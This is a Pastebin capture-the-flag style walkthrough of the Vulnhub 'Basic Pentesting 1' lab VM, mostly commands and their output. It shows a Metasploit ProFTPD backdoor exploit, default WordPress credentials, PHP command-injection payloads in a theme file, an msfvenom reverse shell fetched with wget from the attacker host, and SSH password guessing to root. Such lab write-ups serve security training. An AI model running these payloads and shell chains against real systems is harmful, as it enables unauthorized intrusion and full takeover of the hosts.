API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 18th, 2018
574
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.27 KB | None | 0 0
raw download clone embed print report
  1. # This is a walkthrough of the basic_pentesting_1.ova/csec VM from Vulnhub.
  2. #
  3. # It will be structured as follows:
  4. # 0: Recon
  5. # 0.0: NMAP results
  6. # 0.1: Service exploration
  7. # 0.1.0: HTTP
  8. # 0.1.1: FTP
  9. # 1: Exploitation
  10. # 1.0: FTP
  11. # 1.0.0: First blood
  12. # 1.1: HTTP
  13. # 1.1.0: WordPress admin user
  14. # 1.1.1: PHP code injection --> shell
  15. # 2: Privledge Escellation
  16. # 2.0: User enumeration
  17. # 2.1: Password guessing for User
  18. # 2.2: I AM ROOT!
  19. # 3: Greetz and supporting information
  20. #
  21. # 0: Recon
  22. # After importing the .ova file the VM named csec was added, and
  23. # networking settings were adjusted to be host-only adaptors for the
  24. # attacking machine and the system under test. Both systems were
  25. # assigned DHCP addresses in the 192.168.56.0/24 network. Specifically
  26. # the attacking machine (wrath) held the address 192.168.56.102, and
  27. # the system under test held the address 192.168.56.101.
  28. #
  29. # 0.0: NMAP results
  30. sm0key@wrath:~/hax/csec$ nmap -n -A -Pn 192.168.56.101
  31.  
  32. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-18 08:37 EST
  33. Nmap scan report for 192.168.56.101
  34. Host is up (0.00050s latency).
  35. Not shown: 997 closed ports
  36. PORT STATE SERVICE VERSION
  37. 21/tcp open ftp ProFTPD 1.3.3c
  38. 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
  39. | ssh-hostkey:
  40. | 2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
  41. | 256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
  42. |_ 256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (EdDSA)
  43. 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
  44. |_http-server-header: Apache/2.4.18 (Ubuntu)
  45. |_http-title: Site doesn't have a title (text/html).
  46. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  47.  
  48. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  49. Nmap done: 1 IP address (1 host up) scanned in 7.77 seconds
  50. #
  51. # 0.1: Service exploration
  52. # 0.1.0: HTTP
  53. # Being that most of my experience is with testing
  54. # web applications, and my preference for such; I
  55. # chose to begin enumeration and exploration with
  56. # the service running on port 80.
  57. # First I just performed a GET request for / of the
  58. # application to see what I was working with.
  59. #
  60. sm0key@wrath:~/hax/csec$ curl http://192.168.56.101/
  61. <html><body><h1>It works!</h1>
  62. <p>This is the default web page for this server.</p>
  63. <p>The web server software is running but no content has been added, yet.</p>
  64. </body></html>
  65. #
  66. # Well, that was not very useful.
  67. # I next chose to run dirb against the root of the
  68. # web application to see what goodies were avaliable.
  69. #
  70. sm0key@wrath:~/hax/csec$ dirb http://192.168.56.101/
  71.  
  72. -----------------
  73. DIRB v2.22
  74. By The Dark Raver
  75. -----------------
  76.  
  77. START_TIME: Wed Jan 17 10:58:03 2018
  78. URL_BASE: http://192.168.56.101/
  79. WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
  80.  
  81. -----------------
  82.  
  83. GENERATED WORDS: 4612
  84.  
  85. ---- Scanning URL: http://192.168.56.101/ ----
  86. + http://192.168.56.101/index.html (CODE:200|SIZE:177)
  87. ==> DIRECTORY: http://192.168.56.101/secret/
  88. + http://192.168.56.101/server-status (CODE:403|SIZE:302)
  89.  
  90. ---- Entering directory: http://192.168.56.101/secret/ ----
  91. + http://192.168.56.101/secret/index.php (CODE:301|SIZE:0)
  92. ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/
  93. ==> DIRECTORY: http://192.168.56.101/secret/wp-content/
  94. ==> DIRECTORY: http://192.168.56.101/secret/wp-includes/
  95. + http://192.168.56.101/secret/xmlrpc.php (CODE:405|SIZE:42)
  96.  
  97. ---- Entering directory: http://192.168.56.101/secret/wp-admin/ ----
  98. + http://192.168.56.101/secret/wp-admin/admin.php (CODE:302|SIZE:0)
  99. ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/css/
  100. ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/images/
  101. ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/includes/
  102. + http://192.168.56.101/secret/wp-admin/index.php (CODE:302|SIZE:0)
  103. ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/js/
  104. ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/maint/
  105. ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/network/
  106. ==> DIRECTORY: http://192.168.56.101/secret/wp-admin/user/
  107.  
  108. ---- Entering directory: http://192.168.56.101/secret/wp-content/ ----
  109. + http://192.168.56.101/secret/wp-content/index.php (CODE:200|SIZE:0)
  110. ==> DIRECTORY: http://192.168.56.101/secret/wp-content/plugins/
  111. ==> DIRECTORY: http://192.168.56.101/secret/wp-content/themes/
  112.  
  113. ---- Entering directory: http://192.168.56.101/secret/wp-includes/ ----
  114. (!) WARNING: Directory IS LISTABLE. No need to scan it.
  115. (Use mode '-w' if you want to scan it anyway)
  116.  
  117. ---- Entering directory: http://192.168.56.101/secret/wp-admin/css/ ----
  118. (!) WARNING: Directory IS LISTABLE. No need to scan it.
  119. (Use mode '-w' if you want to scan it anyway)
  120.  
  121. ---- Entering directory: http://192.168.56.101/secret/wp-admin/images/ ----
  122. (!) WARNING: Directory IS LISTABLE. No need to scan it.
  123. (Use mode '-w' if you want to scan it anyway)
  124.  
  125. ---- Entering directory: http://192.168.56.101/secret/wp-admin/includes/ ----
  126. (!) WARNING: Directory IS LISTABLE. No need to scan it.
  127. (Use mode '-w' if you want to scan it anyway)
  128.  
  129. ---- Entering directory: http://192.168.56.101/secret/wp-admin/js/ ----
  130. (!) WARNING: Directory IS LISTABLE. No need to scan it.
  131. (Use mode '-w' if you want to scan it anyway)
  132.  
  133. ---- Entering directory: http://192.168.56.101/secret/wp-admin/maint/ ----
  134. (!) WARNING: Directory IS LISTABLE. No need to scan it.
  135. (Use mode '-w' if you want to scan it anyway)
  136.  
  137. ---- Entering directory: http://192.168.56.101/secret/wp-admin/network/ ----
  138. + http://192.168.56.101/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
  139. + http://192.168.56.101/secret/wp-admin/network/index.php (CODE:302|SIZE:0)
  140.  
  141. ---- Entering directory: http://192.168.56.101/secret/wp-admin/user/ ----
  142. + http://192.168.56.101/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)
  143. + http://192.168.56.101/secret/wp-admin/user/index.php (CODE:302|SIZE:0)
  144.  
  145. ---- Entering directory: http://192.168.56.101/secret/wp-content/plugins/ ----
  146. + http://192.168.56.101/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)
  147.  
  148. ---- Entering directory: http://192.168.56.101/secret/wp-content/themes/ ----
  149. + http://192.168.56.101/secret/wp-content/themes/index.php (CODE:200|SIZE:0)
  150.  
  151. -----------------
  152. END_TIME: Wed Jan 17 10:58:34 2018
  153. DOWNLOADED: 36896 - FOUND: 13
  154. #
  155. # Oh look at that! She has a secret, and it
  156. # appears to be a WordPress application. Now
  157. # WordPress applications are, in the wild,
  158. # pretty much ALWAYS vulnerable. I make a
  159. # note, and decide to move on in exploration.
  160. #
  161. # 0.1.1: FTP
  162. # The next thing that caught my eye was the
  163. # FTP service.
  164. # From the NMAP results we have a precise
  165. # service version, and product name of
  166. # ProFTPD 1.3.3c the first order of business
  167. # is to throw that into searchsploit and
  168. # see what we get.
  169. #
  170. sm0key@wrath:~/hax/csec$ searchsploit ProFTPD 1.3.3c
  171. ---------------------------------------------------------------------------- -----------------------------------
  172. Exploit Title | Path
  173. | (/opt/exploit-database/)
  174. ---------------------------------------------------------------------------- -----------------------------------
  175. ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution | exploits/linux/remote/15662.txt
  176. ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16921.rb
  177. ---------------------------------------------------------------------------- -----------------------------------
  178. #
  179. # Looks like there is a Metasploit module
  180. # which would give us command execution, and
  181. # a backdoor.
  182. #
  183. # 1: Exploitation
  184. # 1.0: FTP
  185. # 1.0.0: First blood
  186. # In the name of failing fast and often I chose
  187. # to attempt the metasploit module first. In a
  188. # real environment I would probably not go for
  189. # metasploit as it has very easy to identify
  190. # signatures for IPS/IDS/FW etc. but this is the
  191. # lab so #YOLO!!!!
  192. #
  193. sm0key@wrath:~/hax/csec$ msfconsole
  194. Found a database at /home/sm0key/.msf4/db, checking to see if it is started
  195. Starting database at /home/sm0key/.msf4/db...success
  196.  
  197.  
  198. Metasploit Park, System Security Interface
  199. Version 4.0.5, Alpha E
  200. Ready...
  201. > access security
  202. access: PERMISSION DENIED.
  203. > access security grid
  204. access: PERMISSION DENIED.
  205. > access main security grid
  206. access: PERMISSION DENIED....and...
  207. YOU DIDN'T SAY THE MAGIC WORD!
  208. YOU DIDN'T SAY THE MAGIC WORD!
  209. YOU DIDN'T SAY THE MAGIC WORD!
  210. YOU DIDN'T SAY THE MAGIC WORD!
  211. YOU DIDN'T SAY THE MAGIC WORD!
  212. YOU DIDN'T SAY THE MAGIC WORD!
  213. YOU DIDN'T SAY THE MAGIC WORD!
  214.  
  215.  
  216. =[ metasploit v4.16.32-dev- ]
  217. + -- --=[ 1726 exploits - 986 auxiliary - 300 post ]
  218. + -- --=[ 507 payloads - 40 encoders - 10 nops ]
  219. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  220.  
  221. msf > use exploit/unix/ftp/proftpd_133c_backdoor
  222. msf exploit(unix/ftp/proftpd_133c_backdoor) > set RHOST 192.168.56.101
  223. RHOST => 192.168.56.101
  224. msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
  225. payload => cmd/unix/reverse
  226. msf exploit(unix/ftp/proftpd_133c_backdoor) > set LHOST 192.168.56.102
  227. LHOST => 192.168.56.102
  228. msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
  229.  
  230. [*] Started reverse TCP double handler on 192.168.56.102:4444
  231. [*] 192.168.56.101:21 - Sending Backdoor Command
  232. [*] Accepted the first client connection...
  233. [*] Accepted the second client connection...
  234. [*] Command: echo nqRYDUkDUJtPBQ4b;
  235. [*] Writing to socket A
  236. [*] Writing to socket B
  237. [*] Reading from sockets...
  238. [*] Reading from socket A
  239. [*] A: "nqRYDUkDUJtPBQ4b\r\n"
  240. [*] Matching...
  241. [*] B is input...
  242. [*] Command shell session 1 opened (192.168.56.102:4444 -> 192.168.56.101:39888) at 2018-01-18 09:40:16 -0500
  243.  
  244. id
  245. uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
  246. ^C
  247. Abort session 1? [y/N] y
  248.  
  249. [*] 192.168.56.101 - Command shell session 1 closed. Reason: User exit
  250. msf exploit(unix/ftp/proftpd_133c_backdoor) >
  251. #
  252. # Well, she just gave us root right off the
  253. # hop. I mean, at this point it's game over,
  254. # but I'm not the kind of dude who likes to
  255. # win that easily.
  256. # Let's keep poking this bear and see what
  257. # else she has to show us.
  258. #
  259. # 1.1: HTTP
  260. # 1.1.0: WordPress admin user
  261. # Time to take a look at the wordpress side
  262. # of this picture. To begin we will make a
  263. # GET request to /secret/wp-admin/admin.php
  264. #
  265. sm0key@wrath:~/hax/csec$ curl -v http://192.168.56.101/secret/wp-admin/admin.php
  266. * Trying 192.168.56.101...
  267. * TCP_NODELAY set
  268. * Connected to 192.168.56.101 (192.168.56.101) port 80 (#0)
  269. > GET /secret/wp-admin/admin.php HTTP/1.1
  270. > Host: 192.168.56.101
  271. > User-Agent: curl/7.57.0
  272. > Accept: */*
  273. >
  274. < HTTP/1.1 302 Found
  275. < Date: Thu, 18 Jan 2018 14:45:42 GMT
  276. < Server: Apache/2.4.18 (Ubuntu)
  277. < Expires: Wed, 11 Jan 1984 05:00:00 GMT
  278. < Cache-Control: no-cache, must-revalidate, max-age=0
  279. < Location: http://vtcsec/secret/wp-login.php?redirect_to=http%3A%2F%2F192.168.56.101%2Fsecret%2Fwp-admin%2Fadmin.php&reauth=1
  280. < Content-Length: 0
  281. < Content-Type: text/html; charset=UTF-8
  282. <
  283. * Connection #0 to host 192.168.56.101 left intact
  284. #
  285. # As you can see she is giving us an HTTP 302
  286. # asking us to go to a host named 'vtcsec'. On
  287. # a hunch I tossed a quick line in my hosts
  288. # file.
  289. #
  290. sm0key@wrath:~/hax/csec$ cat /etc/hosts
  291. 127.0.0.1 localhost
  292. 192.168.56.101 vtcsec
  293. #
  294. # I then directed my browser back to the admin.php
  295. # url above.
  296. # That gave us a wordpress login page. Now I personally
  297. # am not capable of seeing a login form without
  298. # typing admin <tab> admin and seeing what happens.
  299. # In this case, like many others before, admin/admin
  300. # worked like a champ. I was greeted with the
  301. # administrative dashboard of the WordPress app.
  302. #
  303. # 1.1.1: PHP code injection --> shell
  304. #
  305. # Alright so we have admin rights on the WordPress
  306. # app. This means we probably have PHP code
  307. # injection. This looks like a more fun thing to
  308. # exploit. At least it will require some work.
  309. # Let's test the theory that we can use this for
  310. # code injection. It is important to note that when
  311. # doing php injection like this, the ending php tag
  312. # '?>' is not necessary, and will cause unexpected
  313. # behavior in wordpress.
  314. #
  315. # I went to edit 404.php in
  316. #
  317. http://vtcsec/secret/wp-admin/theme-editor.php?file=404.php&theme=twentyseventeen
  318. #
  319. # for the smoke test I chose phpinfo(). I removed
  320. # all the code from the template, and replaced it
  321. # with:
  322. #
  323. <?php phpinfo();
  324. #
  325. # Visiting the modified file at
  326. #
  327. http://vtcsec/secret/wp-content/themes/twentyseventeen/404.php
  328. #
  329. # Did indeed show our phpinfo page as expected.
  330. # We now have command execution. Now we just
  331. # need to get a shell from her. I used the below
  332. # series of payloads to identify what was
  333. # avaliable, and prepare for my final approach.
  334. #
  335. Payload:
  336. <?php echo(`which curl 2>&1`);
  337. Response:
  338. ''
  339. Payload:
  340. <?php echo(`which wget 2>&1`);
  341. Response:
  342. /usr/bin/wget
  343. Payload:
  344. <?php echo(`ls -lah 2>&1`);
  345. Response:
  346. total 544K
  347. drwxr-xr-x 5 www-data www-data 4.0K Nov 15 19:14 .
  348. drwxr-xr-x 5 www-data www-data 4.0K Nov 15 19:14 ..
  349. -rw-r--r-- 1 www-data www-data 27 Jan 18 10:14 404.php
  350. -rw-r--r-- 1 www-data www-data 3.3K Nov 1 18:43 README.txt
  351. -rw-r--r-- 1 www-data www-data 1.8K Nov 1 2016 archive.php
  352. drwxr-xr-x 5 www-data www-data 4.0K Nov 15 19:14 assets
  353. -rw-r--r-- 1 www-data www-data 2.3K Dec 16 2016 comments.php
  354. -rw-r--r-- 1 www-data www-data 1.3K Apr 18 2017 footer.php
  355. -rw-r--r-- 1 www-data www-data 1.6K Jan 6 2017 front-page.php
  356. -rw-r--r-- 1 www-data www-data 19K Oct 4 19:53 functions.php
  357. -rw-r--r-- 1 www-data www-data 1.8K Dec 20 2016 header.php
  358. drwxr-xr-x 2 www-data www-data 4.0K Nov 15 19:14 inc
  359. -rw-r--r-- 1 www-data www-data 2.1K Nov 1 2016 index.php
  360. -rw-r--r-- 1 www-data www-data 965 Oct 23 2016 page.php
  361. -rw-r--r-- 1 www-data www-data 9.4K Oct 4 19:35 rtl.css
  362. -rw-r--r-- 1 www-data www-data 356K Oct 20 2016 screenshot.png
  363. -rw-r--r-- 1 www-data www-data 2.0K Nov 1 2016 search.php
  364. -rw-r--r-- 1 www-data www-data 948 Dec 16 2016 searchform.php
  365. -rw-r--r-- 1 www-data www-data 505 Oct 2 18:04 sidebar.php
  366. -rw-r--r-- 1 www-data www-data 1.6K Dec 16 2016 single.php
  367. -rw-r--r-- 1 www-data www-data 82K Nov 1 18:43 style.css
  368. drwxr-xr-x 7 www-data www-data 4.0K Nov 15 19:14 template-parts
  369. Payload:
  370. <?php echo(`whoami 2>&1`);
  371. Response:
  372. www-data
  373. #
  374. # Sweet, so at this point we know that we
  375. # have access to wget, and are in a directory
  376. # to which we may write. I take a moment to
  377. # prepare a quick reverse shell.
  378. #
  379. sm0key@wrath:~/hax/csec$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 -f elf >myshell
  380. No platform was selected, choosing Msf::Module::Platform::Linux from the payload
  381. No Arch selected, selecting Arch: x86 from the payload
  382. No encoder or badchars specified, outputting raw payload
  383. Payload size: 123 bytes
  384. Final size of elf file: 207 bytes
  385. #
  386. # Next I launched an instance of SimpleHTTPServer
  387. # and pulled down my package. Then I changed the
  388. # permissions, and prepared for execution.
  389. #
  390. Server side:
  391. sm0key@wrath:~/hax/csec$ python -m SimpleHTTPServer 1234
  392. Serving HTTP on 0.0.0.0 port 1234 ...
  393. 192.168.56.101 - - [18/Jan/2018 10:27:03] "GET /myshell HTTP/1.1" 200 -
  394. ^CTraceback (most recent call last):
  395. File "/usr/lib/python2.7/runpy.py", line 174, in _run_module_as_main
  396. "__main__", fname, loader, pkg_name)
  397. File "/usr/lib/python2.7/runpy.py", line 72, in _run_code
  398. exec code in run_globals
  399. File "/usr/lib/python2.7/SimpleHTTPServer.py", line 235, in <module>
  400. test()
  401. File "/usr/lib/python2.7/SimpleHTTPServer.py", line 231, in test
  402. BaseHTTPServer.test(HandlerClass, ServerClass)
  403. File "/usr/lib/python2.7/BaseHTTPServer.py", line 610, in test
  404. httpd.serve_forever()
  405. File "/usr/lib/python2.7/SocketServer.py", line 231, in serve_forever
  406. poll_interval)
  407. File "/usr/lib/python2.7/SocketServer.py", line 150, in _eintr_retry
  408. return func(*args)
  409. KeyboardInterrupt
  410. Victim side:
  411. Payload:
  412. <?php echo(`wget http://192.168.56.102:1234/myshell 2>&1`);
  413. Response:
  414. --2018-01-18 10:27:03-- http://192.168.56.102:1234/myshell Connecting to 192.168.56.102:1234... connected. HTTP request sent, awaiting response... 200 OK Length: 336 [application/octet-stream] Saving to: 'myshell' 0K 100% 43.7M=0s 2018-01-18 10:27:03 (43.7 MB/s) - 'myshell' saved [336/336]
  415. Payload:
  416. <?php echo(`chmod 755 ./myshell && ls -lah ./myshell 2>&1`);
  417. Response:
  418. -rwxr-xr-x 1 www-data www-data 336 Jan 18 10:22 ./myshell
  419. #
  420. # Alright we have the shell up there and
  421. # it is ready to execute. Now to spin up
  422. # metasploit to catch the call back and
  423. # we should be in.
  424. #
  425. Payload:
  426. <?php echo(`./myshell`);
  427. Response:
  428. sm0key@wrath:~/hax/csec$ msfconsole
  429.  
  430. # cowsay++
  431. ____________
  432. < metasploit >
  433. ------------
  434. \ ,__,
  435. \ (oo)____
  436. (__) )\
  437. ||--|| *
  438.  
  439.  
  440. =[ metasploit v4.16.32-dev- ]
  441. + -- --=[ 1726 exploits - 986 auxiliary - 300 post ]
  442. + -- --=[ 507 payloads - 40 encoders - 10 nops ]
  443. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  444.  
  445. msf > use exploit/multi/handler
  446. msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
  447. payload => linux/x86/meterpreter/reverse_tcp
  448. msf exploit(multi/handler) > set LHOST 192.168.56.102
  449. LHOST => 192.168.56.102
  450. msf exploit(multi/handler) > show options
  451.  
  452. Module options (exploit/multi/handler):
  453.  
  454. Name Current Setting Required Description
  455. ---- --------------- -------- -----------
  456.  
  457.  
  458. Payload options (linux/x86/meterpreter/reverse_tcp):
  459.  
  460. Name Current Setting Required Description
  461. ---- --------------- -------- -----------
  462. LHOST 192.168.56.102 yes The listen address
  463. LPORT 4444 yes The listen port
  464.  
  465.  
  466. Exploit target:
  467.  
  468. Id Name
  469. -- ----
  470. 0 Wildcard Target
  471.  
  472.  
  473. msf exploit(multi/handler) > run
  474.  
  475. [*] Started reverse TCP handler on 192.168.56.102:4444
  476. [*] Sending stage (857352 bytes) to 192.168.56.101
  477. [*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.101:39970) at 2018-01-18 11:00:07 -0500
  478.  
  479. meterpreter > shell
  480. Process 2153 created.
  481. Channel 1 created.
  482. python -c 'import pty; pty.spawn("/bin/bash")'
  483. #
  484. # 2: Privledge Escellation
  485. # 2.0: User enumeration
  486. #
  487. www-data@vtcsec:~/html/secret/wp-content/themes/twentyseventeen$ cd /home/
  488. cd /home/
  489. www-data@vtcsec:/home$ ls
  490. ls
  491. marlinspike
  492. www-data@vtcsec:/home$
  493. #
  494. # Now we have the name of a standard user.
  495. # Next I decided just for grins to try to
  496. # ssh to the user with some simple passwords
  497. #
  498. # 2.1: Password guessing for User
  499. #
  500. sm0key@wrath:~/hax/csec$ ssh marlinspike@192.168.56.101
  501. marlinspike@192.168.56.101's password: marlinspike
  502. Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
  503.  
  504. * Documentation: https://help.ubuntu.com
  505. * Management: https://landscape.canonical.com
  506. * Support: https://ubuntu.com/advantage
  507.  
  508. 19 packages can be updated.
  509. 19 updates are security updates.
  510.  
  511.  
  512. The programs included with the Ubuntu system are free software;
  513. the exact distribution terms for each program are described in the
  514. individual files in /usr/share/doc/*/copyright.
  515.  
  516. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
  517. applicable law.
  518.  
  519. marlinspike@vtcsec:~$
  520. #
  521. # Looks like the password was just the username
  522. # this is not an uncommon thing, and was a
  523. # lucky guess. Let's see if the user is able
  524. # to sudo to root?
  525. #
  526. marlinspike@vtcsec:~$ sudo su
  527. [sudo] password for marlinspike: marlinspike
  528. #
  529. # 2.2: I AM ROOT!
  530. # Annnnnnnnd root.
  531. #
  532. root@vtcsec:/home/marlinspike# id
  533. uid=0(root) gid=0(root) groups=0(root)
  534. root@vtcsec:/home/marlinspike#
  535. #
  536. # 3: Greetz and supporting information
  537. #
  538. # Greetz to:
  539. # Josiah Pierce
  540. # Gh0s7
  541. # B0n3s
  542. # Fuz3
  543. # Thank you boys for giving me a play space!
  544. #
  545. # Supporting information:
  546. # VM location: https://www.vulnhub.com/entry/basic-pentesting-1,216/
  547. # dirb: https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
  548. # nmap: https://nmap.org/
  549. # metasploit: https://www.metasploit.com/
  550. #
  551. # That's a wrap. Thanks for the read.
  552. # Sm0key
  553. #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!